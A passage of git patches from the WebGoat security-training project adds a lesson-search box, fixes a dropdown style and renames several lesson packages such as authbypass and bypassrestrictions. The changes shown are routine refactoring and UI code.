+                  report_path: 'robotreport'

From 4d48bd3d4c683390be11f9f314dcf96ed12fbbf4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Wed, 27 Jul 2022 13:44:23 +0200
Subject: [PATCH 176/227] fix in style sheet that now shows normal dropdown
 behaviour (#1315)

---
 .../webgoat_introduction/documentation/Introduction_fr.adoc    | 2 +-
 src/main/resources/webgoat/templates/main_new.html             | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
index 813065645..5c3a03265 100644
--- a/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
+++ b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction_fr.adoc
@@ -1,4 +1,4 @@
-== Qu'est-ce que WebGoat
+== Qu'est-ce que WebGoat?
 ---
 
 WebGoat est une application qui explique et teste diverses vulnérabilités du top 10 OWASP.
diff --git a/src/main/resources/webgoat/templates/main_new.html b/src/main/resources/webgoat/templates/main_new.html
index 92c47fd65..87efc9916 100644
--- a/src/main/resources/webgoat/templates/main_new.html
+++ b/src/main/resources/webgoat/templates/main_new.html
@@ -39,7 +39,8 @@
         <div id="lesson-title-wrapper">
 
         </div><!--lesson title end-->
-        <div class="user-nav pull-right" id="user-and-info-nav" style="margin-right: 75px;">
+        <!--<div class="user-nav pull-right" id="user-and-info-nav" style="margin-right: 75px;">-->
+        <div style="position: absolute;width:400px; z-index:3; top:22px; right: -90px;">
             <!-- webwolf menu item -->
             <a th:href="@{/WebWolf}" target="_blank">
                 <button type="button" id="webwolf-button" class="btn btn-default right_nav_button"

From 005b9f03a485d46007a1ffabd3cb22e33ca5d8ea Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Sun, 31 Jul 2022 20:45:09 +0200
Subject: [PATCH 177/227] search the menu using input box (#1317)

* working version

* change onchange to oninput with minimum of three chars

* working version with delay and fix for category click
---
 src/main/resources/i18n/messages.properties   |  1 +
 .../resources/webgoat/static/js/search.js     | 45 +++++++++++++++++++
 .../resources/webgoat/templates/main_new.html |  2 +
 3 files changed, 48 insertions(+)
 create mode 100644 src/main/resources/webgoat/static/js/search.js

diff --git a/src/main/resources/i18n/messages.properties b/src/main/resources/i18n/messages.properties
index ebac2bc2f..5e86bade2 100644
--- a/src/main/resources/i18n/messages.properties
+++ b/src/main/resources/i18n/messages.properties
@@ -54,6 +54,7 @@ sign.in=Sign in
 register.new=or register yourself as a new user
 sign.up=Sign up
 register.title=Register 
+searchmenu=Search lesson
 
 
 not.empty=This field is required.
diff --git a/src/main/resources/webgoat/static/js/search.js b/src/main/resources/webgoat/static/js/search.js
new file mode 100644
index 000000000..1a56c2aec
--- /dev/null
+++ b/src/main/resources/webgoat/static/js/search.js
@@ -0,0 +1,45 @@
+let input = document.getElementById('search');
+let timeout = null;
+
+input.addEventListener('keyup', function (e) {
+    clearTimeout(timeout);
+    timeout = setTimeout(function () {
+        //console.log('Value:', input.value);
+        search(input.value);
+    }, 1000);
+});
+
+function search(arg) {
+      var elementId = null;
+      lessons = document.querySelectorAll('[class="lesson"]');
+      lessons.forEach(function(lesson) {
+        lessonLowerCase = lesson.textContent.toLowerCase();
+        if (arg.length>2 && lessonLowerCase.includes(arg.toLowerCase())) {
+            if (arg.length<7 && arg.toLowerCase().includes('sql')) {
+                elementId = 'A3Injection-SQLInjectionintro';
+                document.getElementById('search').value='sql injection';
+            } else if (arg.length<9 && arg.toLowerCase().includes('pass')) {
+                elementId = 'A7IdentityAuthFailure-Passwordreset';
+                document.getElementById('search').value='password';
+            } else {
+                elementId = lesson.childNodes[0].id;
+                document.getElementById('search').value=lessonLowerCase;
+            }
+        } else {
+            return;
+        }
+      });
+
+      if (elementId != null) {
+        document.getElementById(elementId).click();
+        categoryId = elementId.substring(0,elementId.indexOf("-"));
+        //extra click to make sure menu does not disappear on same category search
+        if (categoryId == 'Challenges') {
+            document.querySelectorAll('[category="Introduction"]')[0].click();
+        } else {
+            document.querySelectorAll('[category="Challenges"]')[0].click();
+        }
+        document.querySelectorAll('[category="'+categoryId+'"]')[0].click();
+      }
+
+};
diff --git a/src/main/resources/webgoat/templates/main_new.html b/src/main/resources/webgoat/templates/main_new.html
index 87efc9916..7a0f1d3b9 100644
--- a/src/main/resources/webgoat/templates/main_new.html
+++ b/src/main/resources/webgoat/templates/main_new.html
@@ -151,6 +151,8 @@
                 </button>
             </a>
 
+            <input class="form-control" type="text" id="search" name="search" th:placeholder="#{searchmenu}"  style="width:60%" />
+            <script src="js/search.js" ></script>
 
         </div>
     </header>

From c63345e4ee14155b2fe3b5de56aa4f245b996d12 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Tue, 26 Jul 2022 23:46:27 +0200
Subject: [PATCH 178/227] Rename authbypass

---
 .../AccountVerificationHelper.java                  |   2 +-
 .../{auth_bypass => authbypass}/AuthBypass.java     |   2 +-
 .../{auth_bypass => authbypass}/VerifyAccount.java  |   2 +-
 .../documentation/2fa-bypass.adoc                   |   0
 .../documentation/bypass-intro.adoc                 |   0
 .../documentation/lesson-template-video.adoc        |   0
 .../html/AuthBypass.html                            |   8 ++++----
 .../i18n/WebGoatLabels.properties                   |   0
 .../images/firefox-proxy-config.png                 | Bin
 .../images/paypal-2fa-bypass.png                    | Bin
 .../{auth_bypass => authbypass}/js/bypass.js        |   0
 .../BypassVerificationTest.java                     |   3 ++-
 12 files changed, 9 insertions(+), 8 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{auth_bypass => authbypass}/AccountVerificationHelper.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{auth_bypass => authbypass}/AuthBypass.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{auth_bypass => authbypass}/VerifyAccount.java (98%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/documentation/2fa-bypass.adoc (100%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/documentation/bypass-intro.adoc (100%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/documentation/lesson-template-video.adoc (100%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/html/AuthBypass.html (92%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/images/firefox-proxy-config.png (100%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/images/paypal-2fa-bypass.png (100%)
 rename src/main/resources/lessons/{auth_bypass => authbypass}/js/bypass.js (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{auth_bypass => authbypass}/BypassVerificationTest.java (96%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AccountVerificationHelper.java b/src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/auth_bypass/AccountVerificationHelper.java
rename to src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java
index 2d173cef6..bf11d0ce6 100644
--- a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AccountVerificationHelper.java
+++ b/src/main/java/org/owasp/webgoat/lessons/authbypass/AccountVerificationHelper.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.auth_bypass;
+package org.owasp.webgoat.lessons.authbypass;
 
 import java.util.HashMap;
 import java.util.Map;
diff --git a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java b/src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
rename to src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java
index 9e0694256..cb01d5a01 100644
--- a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/AuthBypass.java
+++ b/src/main/java/org/owasp/webgoat/lessons/authbypass/AuthBypass.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.auth_bypass;
+package org.owasp.webgoat.lessons.authbypass;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/VerifyAccount.java b/src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/auth_bypass/VerifyAccount.java
rename to src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java
index 1988c6f85..2ca6ee5f0 100644
--- a/src/main/java/org/owasp/webgoat/lessons/auth_bypass/VerifyAccount.java
+++ b/src/main/java/org/owasp/webgoat/lessons/authbypass/VerifyAccount.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.auth_bypass;
+package org.owasp.webgoat.lessons.authbypass;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/resources/lessons/auth_bypass/documentation/2fa-bypass.adoc b/src/main/resources/lessons/authbypass/documentation/2fa-bypass.adoc
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/documentation/2fa-bypass.adoc
rename to src/main/resources/lessons/authbypass/documentation/2fa-bypass.adoc
diff --git a/src/main/resources/lessons/auth_bypass/documentation/bypass-intro.adoc b/src/main/resources/lessons/authbypass/documentation/bypass-intro.adoc
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/documentation/bypass-intro.adoc
rename to src/main/resources/lessons/authbypass/documentation/bypass-intro.adoc
diff --git a/src/main/resources/lessons/auth_bypass/documentation/lesson-template-video.adoc b/src/main/resources/lessons/authbypass/documentation/lesson-template-video.adoc
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/documentation/lesson-template-video.adoc
rename to src/main/resources/lessons/authbypass/documentation/lesson-template-video.adoc
diff --git a/src/main/resources/lessons/auth_bypass/html/AuthBypass.html b/src/main/resources/lessons/authbypass/html/AuthBypass.html
similarity index 92%
rename from src/main/resources/lessons/auth_bypass/html/AuthBypass.html
rename to src/main/resources/lessons/authbypass/html/AuthBypass.html
index 0ddb748a1..914bd2064 100644
--- a/src/main/resources/lessons/auth_bypass/html/AuthBypass.html
+++ b/src/main/resources/lessons/authbypass/html/AuthBypass.html
@@ -4,14 +4,14 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/bypass-intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/authbypass/documentation/bypass-intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/2fa-bypass.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/authbypass/documentation/2fa-bypass.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
@@ -72,9 +72,9 @@
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <!--<div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/lesson-template-video.adoc"></div>-->
+        <!--<div class="adoc-content" th:replace="doc:lessons/authbypass/documentation/lesson-template-video.adoc"></div>-->
         <!-- can use multiple adoc's in a page-wrapper if you want ... or not-->
-        <!--<div class="adoc-content" th:replace="doc:lessons/auth_bypass/documentation/lesson-template-attack.adoc"></div>-->
+        <!--<div class="adoc-content" th:replace="doc:lessons/authbypass/documentation/lesson-template-attack.adoc"></div>-->
 
         <!-- WebGoat will automatically style and scaffold some functionality by using the div.attack-container as below -->
 
diff --git a/src/main/resources/lessons/auth_bypass/i18n/WebGoatLabels.properties b/src/main/resources/lessons/authbypass/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/authbypass/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/auth_bypass/images/firefox-proxy-config.png b/src/main/resources/lessons/authbypass/images/firefox-proxy-config.png
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/images/firefox-proxy-config.png
rename to src/main/resources/lessons/authbypass/images/firefox-proxy-config.png
diff --git a/src/main/resources/lessons/auth_bypass/images/paypal-2fa-bypass.png b/src/main/resources/lessons/authbypass/images/paypal-2fa-bypass.png
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/images/paypal-2fa-bypass.png
rename to src/main/resources/lessons/authbypass/images/paypal-2fa-bypass.png
diff --git a/src/main/resources/lessons/auth_bypass/js/bypass.js b/src/main/resources/lessons/authbypass/js/bypass.js
similarity index 100%
rename from src/main/resources/lessons/auth_bypass/js/bypass.js
rename to src/main/resources/lessons/authbypass/js/bypass.js
diff --git a/src/test/java/org/owasp/webgoat/lessons/auth_bypass/BypassVerificationTest.java b/src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java
similarity index 96%
rename from src/test/java/org/owasp/webgoat/lessons/auth_bypass/BypassVerificationTest.java
rename to src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java
index 59b22484b..03d1be62f 100644
--- a/src/test/java/org/owasp/webgoat/lessons/auth_bypass/BypassVerificationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java
@@ -23,13 +23,14 @@
  * <p>
  */
 
-package org.owasp.webgoat.lessons.auth_bypass;
+package org.owasp.webgoat.lessons.authbypass;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.authbypass.VerifyAccount;
 import org.springframework.test.web.servlet.MockMvc;
 
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;

From 8a353169859564c5b8fb2bc27d6af7d3e5b2b7fa Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 18:36:25 +0200
Subject: [PATCH 179/227] Rename to bypassrestrictions

---
 .../BypassRestrictions.java                                 | 2 +-
 .../BypassRestrictionsFieldRestrictions.java                | 2 +-
 .../BypassRestrictionsFrontendValidation.java               | 2 +-
 .../css/bypass-restrictions.css                             | 0
 .../documentation/BypassRestrictions_FieldRestrictions.adoc | 0
 .../BypassRestrictions_FrontendValidation.adoc              | 0
 .../documentation/BypassRestrictions_Intro.adoc             | 0
 .../html/BypassRestrictions.html                            | 6 +++---
 .../i18n/WebGoatLabels.properties                           | 0
 .../BypassRestrictionsFrontendValidationTest.java           | 3 ++-
 10 files changed, 8 insertions(+), 7 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{bypass_restrictions => bypassrestrictions}/BypassRestrictions.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{bypass_restrictions => bypassrestrictions}/BypassRestrictionsFieldRestrictions.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{bypass_restrictions => bypassrestrictions}/BypassRestrictionsFrontendValidation.java (98%)
 rename src/main/resources/lessons/{bypass_restrictions => bypassrestrictions}/css/bypass-restrictions.css (100%)
 rename src/main/resources/lessons/{bypass_restrictions => bypassrestrictions}/documentation/BypassRestrictions_FieldRestrictions.adoc (100%)
 rename src/main/resources/lessons/{bypass_restrictions => bypassrestrictions}/documentation/BypassRestrictions_FrontendValidation.adoc (100%)
 rename src/main/resources/lessons/{bypass_restrictions => bypassrestrictions}/documentation/BypassRestrictions_Intro.adoc (100%)
 rename src/main/resources/lessons/{bypass_restrictions => bypassrestrictions}/html/BypassRestrictions.html (94%)
 rename src/main/resources/lessons/{bypass_restrictions => bypassrestrictions}/i18n/WebGoatLabels.properties (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{bypass_restrictions => bypassrestrictions}/BypassRestrictionsFrontendValidationTest.java (95%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictions.java b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictions.java
rename to src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java
index 7263f85bd..0b6d259b9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictions.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypassrestrictions;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFieldRestrictions.java b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
rename to src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java
index 7f87f0ff6..6deeb3eca 100644
--- a/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFieldRestrictions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFieldRestrictions.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypassrestrictions;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidation.java b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidation.java
rename to src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java
index 0c7bce6a0..f4bfd2230 100644
--- a/src/main/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidation.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypassrestrictions;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/resources/lessons/bypass_restrictions/css/bypass-restrictions.css b/src/main/resources/lessons/bypassrestrictions/css/bypass-restrictions.css
similarity index 100%
rename from src/main/resources/lessons/bypass_restrictions/css/bypass-restrictions.css
rename to src/main/resources/lessons/bypassrestrictions/css/bypass-restrictions.css
diff --git a/src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FieldRestrictions.adoc b/src/main/resources/lessons/bypassrestrictions/documentation/BypassRestrictions_FieldRestrictions.adoc
similarity index 100%
rename from src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FieldRestrictions.adoc
rename to src/main/resources/lessons/bypassrestrictions/documentation/BypassRestrictions_FieldRestrictions.adoc
diff --git a/src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FrontendValidation.adoc b/src/main/resources/lessons/bypassrestrictions/documentation/BypassRestrictions_FrontendValidation.adoc
similarity index 100%
rename from src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_FrontendValidation.adoc
rename to src/main/resources/lessons/bypassrestrictions/documentation/BypassRestrictions_FrontendValidation.adoc
diff --git a/src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_Intro.adoc b/src/main/resources/lessons/bypassrestrictions/documentation/BypassRestrictions_Intro.adoc
similarity index 100%
rename from src/main/resources/lessons/bypass_restrictions/documentation/BypassRestrictions_Intro.adoc
rename to src/main/resources/lessons/bypassrestrictions/documentation/BypassRestrictions_Intro.adoc
diff --git a/src/main/resources/lessons/bypass_restrictions/html/BypassRestrictions.html b/src/main/resources/lessons/bypassrestrictions/html/BypassRestrictions.html
similarity index 94%
rename from src/main/resources/lessons/bypass_restrictions/html/BypassRestrictions.html
rename to src/main/resources/lessons/bypassrestrictions/html/BypassRestrictions.html
index d32267c75..4c506a09f 100755
--- a/src/main/resources/lessons/bypass_restrictions/html/BypassRestrictions.html
+++ b/src/main/resources/lessons/bypassrestrictions/html/BypassRestrictions.html
@@ -6,12 +6,12 @@
     <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
     <!-- include content here. Content will be presented via asciidocs files,
     which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-    <div class="adoc-content" th:replace="doc:lessons/bypass_restrictions/documentation/BypassRestrictions_Intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/bypassrestrictions/documentation/BypassRestrictions_Intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
     <!-- stripped down without extra comments -->
-    <div class="adoc-content" th:replace="doc:lessons/bypass_restrictions/documentation/BypassRestrictions_FieldRestrictions.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/bypassrestrictions/documentation/BypassRestrictions_FieldRestrictions.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/bypass-restrictions.css}"/>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -59,7 +59,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/bypass_restrictions/documentation/BypassRestrictions_FrontendValidation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/bypassrestrictions/documentation/BypassRestrictions_FrontendValidation.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 
diff --git a/src/main/resources/lessons/bypass_restrictions/i18n/WebGoatLabels.properties b/src/main/resources/lessons/bypassrestrictions/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/bypass_restrictions/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/bypassrestrictions/i18n/WebGoatLabels.properties
diff --git a/src/test/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java b/src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java
similarity index 95%
rename from src/test/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
rename to src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java
index a4f8c89d6..a8e5a513a 100644
--- a/src/test/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java
@@ -1,8 +1,9 @@
-package org.owasp.webgoat.lessons.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypassrestrictions;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.bypassrestrictions.BypassRestrictions;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 

From 3b330fb328d59d9eb568a0f176d97813fa66f58b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:13:29 +0200
Subject: [PATCH 180/227] Renamed to chromedevtools

---
 .../ChromeDevTools.java                             |   2 +-
 .../NetworkDummy.java                               |   2 +-
 .../NetworkLesson.java                              |   2 +-
 .../documentation/ChromeDevTools_Assignment.adoc    |   0
 .../ChromeDevTools_Assignment_Network.adoc          |   0
 .../documentation/ChromeDevTools_console.adoc       |   0
 .../documentation/ChromeDevTools_elements.adoc      |   0
 .../documentation/ChromeDevTools_intro.adoc         |   0
 .../documentation/ChromeDevTools_sources.adoc       |   0
 .../html/ChromeDevTools.html                        |  12 ++++++------
 .../i18n/WebGoatLabels.properties                   |   0
 .../images/ChromeDev_Console_Clear.jpg              | Bin
 .../images/ChromeDev_Console_Ex.jpg                 | Bin
 .../images/ChromeDev_Elements.jpg                   | Bin
 .../images/ChromeDev_Elements_CSS.jpg               | Bin
 .../images/ChromeDev_Network.jpg                    | Bin
 .../images/ChromeDev_Sources.jpg                    | Bin
 .../ChromeDevToolsTest.java                         |   4 ++--
 18 files changed, 11 insertions(+), 11 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{chrome_dev_tools => chromedevtools}/ChromeDevTools.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{chrome_dev_tools => chromedevtools}/NetworkDummy.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{chrome_dev_tools => chromedevtools}/NetworkLesson.java (97%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/documentation/ChromeDevTools_Assignment.adoc (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/documentation/ChromeDevTools_Assignment_Network.adoc (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/documentation/ChromeDevTools_console.adoc (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/documentation/ChromeDevTools_elements.adoc (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/documentation/ChromeDevTools_intro.adoc (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/documentation/ChromeDevTools_sources.adoc (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/html/ChromeDevTools.html (79%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/images/ChromeDev_Console_Clear.jpg (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/images/ChromeDev_Console_Ex.jpg (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/images/ChromeDev_Elements.jpg (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/images/ChromeDev_Elements_CSS.jpg (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/images/ChromeDev_Network.jpg (100%)
 rename src/main/resources/lessons/{chrome_dev_tools => chromedevtools}/images/ChromeDev_Sources.jpg (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{chrome_dev_tools => chromedevtools}/ChromeDevToolsTest.java (93%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevTools.java b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevTools.java
rename to src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java
index cd2faeaf4..8b5958c72 100644
--- a/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevTools.java
+++ b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevTools.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chromedevtools;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkDummy.java b/src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkDummy.java
rename to src/main/java/org/owasp/webgoat/lessons/chromedevtools/NetworkDummy.java
index 48c48b598..78bdddbe2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/chrome_dev_tools/NetworkDummy.java
